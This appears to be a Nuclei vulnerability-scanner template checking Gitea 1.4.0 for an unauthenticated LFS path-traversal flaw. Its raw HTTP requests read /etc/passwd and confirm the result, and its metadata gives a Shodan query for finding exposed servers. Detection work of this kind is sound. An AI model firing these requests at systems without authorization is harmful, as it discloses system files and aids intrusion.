2023-03-18 22:07:09 +00:00
|
|
|
id: gitea-rce
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Gitea 1.4.0 - Remote Code Execution
|
|
|
|
author: theamanrawat
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
Gitea 1.4.0 is vulnerable to remote code execution.
|
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/44996
|
|
|
|
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
|
|
|
|
metadata:
|
|
|
|
verified: "true"
|
|
|
|
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
|
2023-03-20 07:05:15 +00:00
|
|
|
tags: gitea,rce,unauth,edb
|
2023-03-18 22:07:09 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /api/v1/repos/search?limit=1 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
- |
|
|
|
|
POST /{{repo}}.git/info/lfs/objects HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
Accept: application/vnd.git-lfs+json
|
|
|
|
|
|
|
|
{
|
|
|
|
"Oid": "....../../../etc/passwd",
|
|
|
|
"Size": 1000000,
|
|
|
|
"User" : "{{randstr}}",
|
|
|
|
"Password" : "{{randstr}}",
|
|
|
|
"Repo" : "{{randstr}}",
|
|
|
|
"Authorization" : "{{randstr}}"
|
|
|
|
}
|
|
|
|
|
|
|
|
- |
|
|
|
|
GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: body_3
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header_3
|
|
|
|
words:
|
|
|
|
- "application/octet-stream"
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
name: repo
|
|
|
|
group: 1
|
|
|
|
regex:
|
|
|
|
- '"name":".*","full_name":"(.*)","description"'
|
|
|
|
internal: true
|